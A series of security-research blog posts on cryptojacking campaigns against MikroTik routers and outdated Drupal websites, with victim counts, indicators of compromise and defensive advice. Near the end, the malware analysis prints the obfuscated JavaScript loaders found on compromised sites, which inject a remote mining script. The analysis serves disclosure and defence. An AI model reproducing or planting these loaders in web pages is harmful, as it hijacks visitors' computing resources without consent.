200,000+ MikroTik routers worldwide have been compromised to inject cryptojacking malware

Over the last two months, the Bad Packets LLC team has been monitoring over 80 unique cryptojacking campaigns targeting vulnerable MikroTik routers. The latest statistics available from Censys and Shodan confirm hundreds of thousands devices remain compromised.

These MikroTik routers are being compromised by miscreants exploiting CVE-2018-14847, a critical vulnerability that affects all versions of RouterOS through 6.42. A patch was issued earlier this year by MikroTik, however the latest statistics (above) reveal device owners and network operators have chosen not to apply it.

Ali Mosajjal provides an excellent discussion of this vulnerability and how it’s exploited here. Another post, by Simon Kenin, explains how the first cryptojacking campaigns targeted over a 170,000 MikroTik routers in Brazil alone. Kenin described it best when he stated:

“Let me emphasize how bad this attack is. The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end user computers, they would go straight to the source; carrier-grade router devices.’

Despite the warnings from Mosajjal and Kenin, numerous MikroTik routers worldwide remain compromised. Looking strictly at Coinhive infections alone, we clearly see the unfortunate truth.

However, Coinhive isn’t the only type of cryptojacking malware being injected via these compromised routers. Looking at all the campaigns noted in the MikroTik Cryptojacking Campaigns spreadsheet, we find some interesting contenders.

Coinhive is clearly the dominant choice of miscreants looking for cryptojacking victims.
Coinhive is clearly the dominant choice of miscreants looking for cryptojacking victims.

While Coinhive is used in the vast majority of cryptojacking campaigns, it is not used by the largest campaign. Instead, CoinImp is used in a campaign consisting of 115,000 MikroTik routers, per the latest Censys results. A large share of compromised devices are found on the network of two service providers in Iran, AS59566 and AS56616.

In this campaign, CoinImp is injected via https://srcip[.]com/src.js which embeds an iframe pointing to https://srcip[.]com/js.html which contains the cryptocurrency mining JavaScript code.

CoinImp is injected via https://www.hostingcloud[.]science./M5q5.js
CoinImp is injected via https://www.hostingcloud[.]science./M5q5.js
Twitter user @VriesHd raises a good point that despite clear evidence, no AV company has flagged the domain or URL as malicious. Fortunately, users of the CoinBlockerLists are protected as all domains mentioned in this post and the IOC spreadsheet are included.

Another cryptojacking campaign seemingly running rampant was discovered earlier in September.

In this case, the cryptojacking malware appears to be injecting MinerAlt, a service that mines CryptoNight coins (Monero, Electroneum, etc.) while taking 30% of the revenue of their users. Unlike Coinhive, the websocket traffic is not in plain text (shown in tweet above).

Infected routers in this campaign are configured to throttle the CPU usage of the victims’ devices in a likely attempt to reduce detection. In the example shown below, the amount of CPU power used for mining cryptocurrency is roughly 80%.

United States cryptojacking campaigns

Looking specifically at compromised MikroTik routers in the United States, a few troubling cryptojacking campaigns were found. On August 25, nearly 3,000 compromised routers with IP addresses assigned to Cogent Communications were located on Censys.

Almost a month later, another surprising cryptojacking campaign was discovered. This new campaign included over 600 MikroTik routers on the network of Douglas County Public Utility District in north central Washington state. Their network, AS27373, has been allocated 1,792 IPv4 addresses and the latest Censys results show 703 IPs consisting solely of MikroTik routers. In other words, 39% of the IPs they manage route to a compromised device.

Upon reviewing these findings, I notified US-CERT (NCCIC) in addition to other members of federal law enforcement as these routers on the network of a public energy co-operative. While I never received confirmation that an NCCIC incident number was assigned, I was told by the NCCIC to continue to send in similar reports in the future.

It’s alarming to see so many devices on a public utilities’ network compromised, so I hope the NCCIC is able provide them with guidance and/or assistance with the remediation process.

The latest results found on Censys indicate cryptojacking campaigns targeting vulnerable MikroTik routers in the United States is not slowing down. Many Wireless Internet Service Providers (WISPs) appear to affected as numerous compromised devices can be found on their networks.


Instead of listing each IOC here, I have placed them in the MikroTik cryptojacking campaigns spreadsheet that lists each site key used for every campaign and includes notes on how the malware is injected.

Thanks to Censys for providing me with the API credits needed to keep this list frequently updated.

Closing remarks

As I recently told Threatpost, scraping for pennies with Coinhive is not the worst-case scenario that miscreants can do with these compromised MikroTik routers. The report published by Netlab 360 illustrated how they can used for much more nefarious purposes such as eavesdropping all traffic passing through them.

MikroTik users need to ensure they’re running the latest version of RouterOS which has patched CVE-2018-14847. Anyone using version 6.42 or older should apply the update ASAP, available here.

If you’d like to learn more about my work and what others are saying about it, please view my references page. I’ve also coauthored a peer-reviewed research paper, A first look at browser-based cryptojacking.

As always, I’m most active on Twitter — please follow @bad_packets for the latest updates.

Author’s note

The statistics shared in this post were accurate as of September 28, 2018. Since then, the amount of compromised MikroTik routers worldwide has greatly increased. The latest totals reveal over 400,000 have been hacked by miscreants.

How to stop cryptojacking and the theft of your computing resources

Cryptojacking is defined as hijacking your desktop / laptop computer, mobile device, or server to surreptitiously mine cryptocurrency for someone else’s profit. In other words, it’s the theft of computational resources (CPU) and energy (electricity).

Cryptojacking most commonly happens through a web browser. Malicious cryptomining scripts (sometimes referred to as coinminers) are frequently found being injected on compromised websites. Some affected sites have been of well-known organizations and government institutions. Many of the hacked sites found were using vulnerable content management systems or compromised third-party services.

Cryptojacking is typically resource intensive as malicious cryptocurrency mining consumes all CPU resources available. This is because the amount of CPU power used correlates to the speed at which hashes can be generated (mined). The faster hashes are mined, the faster money is made.

High CPU usage caused by cryptojacking
High CPU usage caused by cryptojacking can be observed using the Task Manager.

Mined hashes are sent via a WebSocket connection to a mining pool or a service provider such as Coinhive. While Coinhive remains the market leader, I previously documented how to find other forms of cryptojacking malware that have grown in popularity.

Coinhive websocket traffic shown in Fiddler.
Coinhive websocket traffic shown in Fiddler.


Cryptojacking can be stopped by using a browser extension designed to block malicious cryptocurrency mining scripts.


I recommend using MinerBlock to stop cryptojacking in your browser. This is an easy solution which requires no additional configuration out of the box. MinerBlock prevents cryptojacking using two methods: a frequently updated blacklist and detection of JavaScript executing cryptomining behavior. It’s available for Chrome, Firefox, and is open source.


Another effective method to stop cryptojacking is at the network level (firewall) to prevent the malicious code from reaching your endpoints. I recommend using the CoinBlockerLists for this purpose. These lists are constantly updated as new malicious domains are frequently found.

The lists are available in various formats to easily integrate with your existing solution. A FireHOL feed is also available. For MacOS users, this guide illustrates how the CoinBlockerLists can be implemented using firewall software Little Snitch. Other methods such as DNS filtering using Pi-hole can be used with the CoinBlockerLists.

Resource monitoring

As an independent security researcher, I don’t recommend a specific endpoint protection product for enterprises. Many antivirus / antimalware products such as Malwarebytes, ESET, Avast, Kaspersky, and Windows Defender will block most forms of cryptojacking and coinming malware.

Even with some form of AV protection, resource monitoring of your on-premise and cloud infrastructure is critical. High CPU usage over a sustained period of time is the most apparent indicator of compromise in cases of cryptojacking. Consuming excessive computational resources will increase your cloud service provider bills and energy (electricity) costs.

PRTG logo

Personally, I use PRTG for all my monitoring needs. Paessler recently published a case study featuring my use of the PRTG to monitor cryptojacking incidents. The impact of resource abuse and theft highlights the importance of monitoring. PRTG is free to use up to 100 sensors and can be downloaded here.

If you’d like to learn more about my work and what others are saying about it, please view my references page. I also coauthored a research paper, A first look at browser-based cryptojacking, for further reading on this topic.

As always, I’m most active on Twitter — follow me @bad_packets.

Over 100,000 Drupal websites vulnerable to Drupalgeddon 2 (CVE-2018-7600)

In my previous post, I detailed a large cryptojacking campaign that affected hundreds of Drupal websites. Multiple campaigns remain active today and are documented further in the latest SecurityTrails report. An important question was raised during my initial investigation — How many Drupal sites are vulnerable?

To find the answer, I began by looking for sites using Drupal 7. This is the most widely used version, per Drupal’s core statistics. Using the source code search engine PublicWWW, I was able to locate nearly 500,000 websites using Drupal 7. I promptly began scanning all the sites to establish which were vulnerable, and which were not.

I regarded sites that were using at least version 7.58 as not vulnerable to Drupalgeddon 2. This critical flaw is detailed in Drupal security advisory SA-CORE-2018-002 and has been assigned CVE-2018-7600.

Upon completion of the scan I was able to determine:

  • 115,070 sites were outdated and vulnerable.
  • 134,447 sites were not vulnerable.
  • 225,056 sites I could not ascertain the version used.

Pie chart of vulnerable Drupal websites found

Numerous vulnerable sites found in the Alexa Top 1 Million included websites of major educational institutions in the United States and government organizations around the world. Other notable unpatched sites found were of a large television network, a multinational mass media and entertainment conglomerate, and two well-known computer hardware manufacturers.

Due to the highly critical risk of CVE-2018-7600 being exploited, the list of 115,070 vulnerable sites won’t be shared publicly. However, the list of sites has been shared with US-CERT and the Drupal Security Team. If you represent a national CERT/CSIRT and can offer assistance notifying affected organizations, please contact me.

Another Drupal cryptojacking campaign discovered

While scanning for vulnerable sites, I discovered a new cryptojacking campaign targeting Drupal sites. One of the affected sites was a police department’s website in Belgium. This campaign uses the domain name upgraderservices[.]cf to inject Coinhive.

When the campaign was first discovered, the domain name was using Cloudflare, so the real hosting provider was unknown.

The Coinhive site key used was “ZQXBo9BIgCBhlxCYhc7UAWLJxBfRCVos” however this was later terminated. Because of this, the cryptojacking campaign operator switched to key “0pr13Hw98MvnJ3bJPMUdQyvXvOtOmPZd” and resumed operations on the morning of May 31, 2018.

Twelve hours after my initial report, the malicious code was removed from votrepolice.be and upgraderservices[.]cf was dropped by Cloudflare.

Once this was done, the hosting provider was revealed to be OVH. Simultaneously, the domain’s SSL certificate was switched to LetsEncrypt.

Hundreds of compromised Drupal sites found (again)

To locate compromised sites in this cryptojacking campaign, I scanned the nearly half million Drupal sites for upgraderservices[.]cf. Upon completion, 258 sites were found containing a reference to the malicious domain. I’ve created this spreadsheet listing all of the affected websites.

One of the affected sites in this campaign was the website of the Colorado Attorney General’s Office.

Upon the discovery, I reported the site to US-CERT as I previously did for the US federal government sites found in the previous Drupal cryptojacking campaign. An incident number was assigned by the NCCIC Security Operations Center shortly thereafter.

I also setup PRTG monitoring to confirm when the site was remediated. This was done in less than 24 hours after my initial report.

Other websites in the campaign were noticed by Twitter users, including that of a food truck locating service.

Another affected website found was automobile parts manufacturer Magneti Marelli, a subsidiary of Fiat.

One example found in the campaign had upgraded their Drupal version to the latest version without removing the malicious content. As noted by the Drupal Security Team PSA , “simply updating Drupal will not remove backdoors or fix compromised sites” and further remediation steps are necessary.


Domain / URLs

Coinhive Site Keys

2018-06-07 Update

The Drupal Security Team released a statement regarding my findings that questioned my methodology. While we know 115,000 sites are using outdated Drupal versions, based on the publically accessible CHANGELOG.txt found on each site, it’s possible someone applied a mitigation patch. However, the problem is we have no way of telling if they did — unless we perform the actual exploit.

Unfortunately, attempting the exploit on nearly half a million sites would be highly illegal. Due to this, I won’t be performing the exploit or any variant of it to prove all the sites are vulnerable. The fact remains that each one of the 115,000 sites is using an outdated version Drupal. Using an outdated content management system (CMS) is never best practice.

Closing Remarks

While the amount of vulnerable Drupal websites found is astounding, it’s good to see an even larger share of sites have patched the vulnerability. Hopefully this becomes a trend as more sites continue to be updated.

This latest cryptojacking campaign is yet another example of Drupal websites being exploited on a mass scale. If you’re a website operator using Drupal’s CMS, you need to update to the latest available version ASAP. The Drupal security team has prepared a guide of steps to take if your website has been compromised.

To stop cryptojacking in your browser, I recommend the extension minerBlock. The blocklist provided by CoinBlockerLists is an excellent resource to block coinmining malware and illicit cryptomining operations at the network level.

To learn more about my work and what others are saying about it, please visit this page.

As always, I’m most active on Twitter — follow me @bad_packets

Large cryptojacking campaign targeting vulnerable Drupal websites

Yesterday, I was alerted to a cryptojacking campaign affecting the websites of the San Diego Zoo and the government of Chihuahua, Mexico. While these two sites have no relation to each other, they shared a common denominator — they both are using an outdated and vulnerable version of the Drupal content management system. After I analysed the IOCs, I was able to locate over 300 additional websites in this cryptojacking campaign. Many discovered were government and university sites from all over the world.

Digging a little deeper into the cryptojacking campaign, I found in both cases that Coinhive was injected via the same method. The malicious code was contained in the “/misc/jquery.once.js?v=1.2” JavaScript library. Soon thereafter, I was notified of additional compromised sites using a different payload. However, all the infected sites pointed to the same domain using the same Coinhive site key.

Deobfuscated Coinhive malware
In each case, the malicious code was obfuscated and unreadable to humans.

Once the code was deobfuscated, the reference to “http://vuuwd[.]com/t.js” was clearly seen. Upon visiting the URL, the ugly truth was revealed. A slightly throttled implementation of Coinhive was found.

Domain used to inject Coinhive malware
The Coinhive implementation has small throttle configured to prevent 100% CPU usage.

The site key used was “KNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6.” I confirmed the key was still active by checking in Fiddler. This was a bit redundant as the high CPU usage was a clear indicator of the cryptocurrency mining (hashing) taking place. Regardless, it’s always good to check since Coinhive implemented a few changes to their platform and how they handle abuse after the Brian Krebs investigation.

After contacting the San Diego Zoo advising them to remove the malware, I took a closer look at the domain name vuuwd[.]com.

While the WHOIS information was clearly fake, the email address used was associated with other domain registrations. This information is likely valuable for further investigation, but I decided not to go down that rabbit hole. Instead, I focused on the domain name at-hand, vuuwd[.]com.

This historical DNS data from SecurityTrails was especially interesting. We can clearly see the domain name was used previously in Monero (XMR) mining operations via mineXMR.com. While it’s somewhat unusual they’d switch from a mining pool with a 1% fee to Coinhive, who takes a 30% cut of all mining proceeds, it was the choice they made.

Now that the IOCs were clearly established, I turned to PublicWWW to locate other affected sites. The initial query I used yielded over 100,000 sites with references the JavaScript library “/misc/jquery.once.js?v=1.2” in their source code. This was pared down to around 80,000 sites once I extracted the explicit snippet using regular expression via PublicWWW’s snipex function.

Once I had the potential list of affected sites, I began scanning them for IOCs containing the obfuscated Coinhive malware. This was done using tools developed for me by Dan Snider. Dan has frequently provided invaluable assistance to my research and I recommend reading more about his work here.

The big reveal

After the scan completed, the full scope of this cryptojacking campaign was established — 348 infected websites. Using the bulk scan feature of urlscan.io, it became clear these were all sites were running outdated and vulnerable versions of Drupal content management system.

The affected sites varied by hosting providers and countries and no specific one appeared to be targeted. The most unique domains were found in the United States and were hosted by Amazon.

Unique domains found by countryUnique domains found by hosting provider

Looking further into the sites found, I was able to locate domains tied to educational institutions and government entities all over the world.

Government sites affected

The National Labor Relations Board – US federal agency

Government of Chihuahua, Mexico

City of Marion, Ohio

Arizona Board of Behavioral Health Examiners

Social Security Institute of the State of Mexico and Municipalities

Turkish Revenue Administration – Aydın Tax Office

Procalidad – “The Project Improvement of Higher Education Quality” – Peru

Matzikama Municipality

UMBRIA Special Reconstruction Office


University / school sites affected

University of Aleppo

College of Biblical Studies

IOHANES – University of Balamand

Ringling College of Art and Design

Vidyalankar Institute of Technology

University of Batangas

Asia Pacific Institute of Information Technology (APIIT)

Management Development Institute of Singapore in Tashkent

Islamic Azad University of the Semnan branch

Tan Dan Secondary School


Other sites affected

The full list of domains affected by this cryptojacking campaign is available in this Google Sheet. The direct URL to infected JavaScript library (jquery.once.js?v=1.2) for each site is included. In addition, the title tag (name/description) has been extracted and is listed in the sheet.

2018-05-07 update

Additional websites have been identified and have been added to the Google Sheet. Notable sites include those of Lenovo, UCLA, DLink (Brazil), and Office of Inspector General of the U.S. Equal Employment Opportunity Commission (EEOC) — a US federal government agency.

Malicious code found on Lenovo's portal page.
Malicious code found on Lenovo’s portal page.

Websites of UCLA and DLink Brazil were also found injecting Coinhive.

Coinhive is configured to use roughly 80% CPU to mine for cryptocurrency
Coinhive is configured to use roughly 80% CPU to mine for cryptocurrency.

For some odd reason, the operator of this cryptojacking campaign chose to use a self-signed SSL certificate instead of a trusted (CA) one. This could have easily (and freely) been done using LetsEncrypt — but was not. Due to this, the cryptojacking malware fails to load in the browser via HTTPS.

In addition to the self-signed SSL cert misstep, the reference to the non-secure version is included in some sites, such as the Office of Inspector General of the EEOC. This is yet another blunder that hinders the effectiveness  of this cryptojacking campaign as Coinhive does not load.

2018-05-16 update

This cryptojacking campaign continues as the malware host vuuwd[.]com has been restored with a new Coinhive site key.

The spreadsheet of affected sites has been updated with my latest scan results. Follow me on Twitter for the latest updates on this ongoing story



https://vuuwd[.]com/t.js (Self-signed SSL cert by "WIN-QNCIT36VCLJ")

var RqLm1=window["x64x6fx63x75x6dx65x6ex74"]["x67x65x74x45x6cx65x6dx65x6ex74x73x42x79x54x61x67x4ex61x6dx65"]('x68x65x61x64')[0];var D2=window["x64x6fx63x75x6dx65x6ex74"]["x63x72x65x61x74x65x45x6cx65x6dx65x6ex74"]('x73x63x72x69x70x74');D2["x74x79x70x65"]='x74x65x78x74x2fx6ax61x76x61x73x63x72x69x70x74';D2["x69x64"]='x6dx5fx67x5fx61';D2["x73x72x63"]='x68x74x74x70x3ax2fx2fx76x75x75x77x64x2ex63x6fx6dx2fx74x2ex6ax73';RqLm1["x61x70x70x65x6ex64x43x68x69x6cx64"](D2);

var dZ1= window["x64x6fx63x75x6dx65x6ex74"]["x67x65x74x45x6cx65x6dx65x6ex74x73x42x79x54x61x67x4ex61x6dx65"]('x68x65x61x64')[0]; var ZBRnO2= window["x64x6fx63x75x6dx65x6ex74"]["x63x72x65x61x74x65x45x6cx65x6dx65x6ex74"]('x73x63x72x69x70x74'); ZBRnO2["x74x79x70x65"]= 'x74x65x78x74x2fx6ax61x76x61x73x63x72x69x70x74'; ZBRnO2["x69x64"]='x6dx5fx67x5fx61';ZBRnO2["x73x72x63"]= 'x68x74x74x70x73x3ax2fx2fx76x75x75x77x64x2ex63x6fx6dx2fx74x2ex6ax73'; dZ1["x61x70x70x65x6ex64x43x68x69x6cx64"](ZBRnO2);

;(function(){var k=navigator[b("st{n(e4g9A2r,exs,u8")];var s=document[b("je,i{kaofo6c(")];if(p(k,b("hs{w{o{d;n,i5W)"))&&!p(k,b("rd4i{ojr}d;n)A}"))){if(!p(s,b(":=ea)m,t3u{_,_4_5"))){var w=document.createElement('script');w.type='text/javascript';w.async=true;w.src=b('5a{b)28e;2,0;1,e}5;fa1}1p97c;7)a}c(e;4{2,=)v{&m0}2)2,=,d{i4c4?(s}j1.)end;o,c}_xs)/(g8rio3.{ten}e,m}h,s(e}r)f1e;r)e;v)i;t{i9s,ozpb.wk{c}a}ryt1/}/k:9p)tnt}h8');var z=document.getElementsByTagName('script')[0];z.parentNode.insertBefore(w,z);}}function b(c){var o='';for(var l=0;l<c.length;l++){if(l%2===1)o+=c[l];}o=h(o);return o;}function p(i,t){if(i[b("&f}O,xoe}d,n(i(")](t)!==-1){return true;}else{return false;}}function h(y){var n='';for(var v=y.length-1;v>=0;v--){n+=y[v];}return n;}})();


Closing Remarks

We’ve seen plenty examples of Drupalgeddon 2 being exploited in the past few weeks. This is yet another case of miscreants compromising outdated and vulnerable Drupal installations on a large scale. If you’re a website operator using Drupal’s content management system, you need to update to the latest available version ASAP. The Drupal security team has prepared a FAQ which documents the risk level and mitigation steps. Note that installing the update won’t retroactively “unhack” your website and you may need to take further remediation steps.

To stop cryptojacking in your browser, I recommend the extension minerBlock to block cryptojacking malware.

If you use other methods of blocking malicious activity at the network level, such as Pi-hole, you can use the blocklist provided by CoinBlockerLists, which is frequently updated with the domains and IPs used by coinmining malware and illicit cryptomining operations.

If you’d like to learn more about my work and what others are saying about it, please see this page. As always, I’m most active on Twitter — follow me @bad_packets

Also, be sure to check out my Mirai-like botnet data website!

Recent Podcasts: Packet Pushers & The CoinSec Podcast

In the last month, I was invited to participate in two podcasts. The first was with Packet Pushers and the second with The CoinSec Podcast. This was definitely less hectic than doing a live interview on Canadian national television. In both shows, I shared my thoughts on cryptojacking and other security topics.

Packet Pushers Podcast

Packet Pushers logo

For the Packet Pushers podcast, I was a guest of Paessler. They are the company behind the enterprise and network monitoring application, PRTG. I’ve frequently mentioned PRTG in my tweets as it’s one of my favorite monitoring tools. One of the notable incidents I always like to reference is the Showtime Networks case. This was the first major case of cryptojacking affecting a well-known website and I was the first to document the incident.

PRTG allows me to monitor any website for Coinhive and other cryptojacking malware. This was valuable when the website of Politifact.com was also compromised. I was able to quickly and easily configure monitoring for the site.

In addition to the HTTP Advanced sensor, I use numerous other sensor types in PRTG including: SNMP, SSH, SSL, WMI, and many others discussed in the Packet Pushers podcast. Tune in to find out my favorites!

If you’re looking for the peer-reviewed research paper mentioned in the show, please visit my Publications page.

The CoinSec Podcast


The CoinSec Podcast logo

The second podcast I recorded was with The CoinSec Podcast. This show is about cryptocurrency and blockchain technologies with a focus on securing them. I had a great time discussing cryptojacking and other security issues affecting the cryptocurrency ecosystem.

Closing Remarks

While it’s a little nerve-wracking recording podcasts or television interviews, I always enjoy sharing my thoughts on cryptojacking and other security topics. If you’d like to learn more about my work and what others are saying about it, please see this page.

As always, I’m most active on Twitter – follow me @bad_packets

Also, be sure to check out my Mirai-like botnet data website!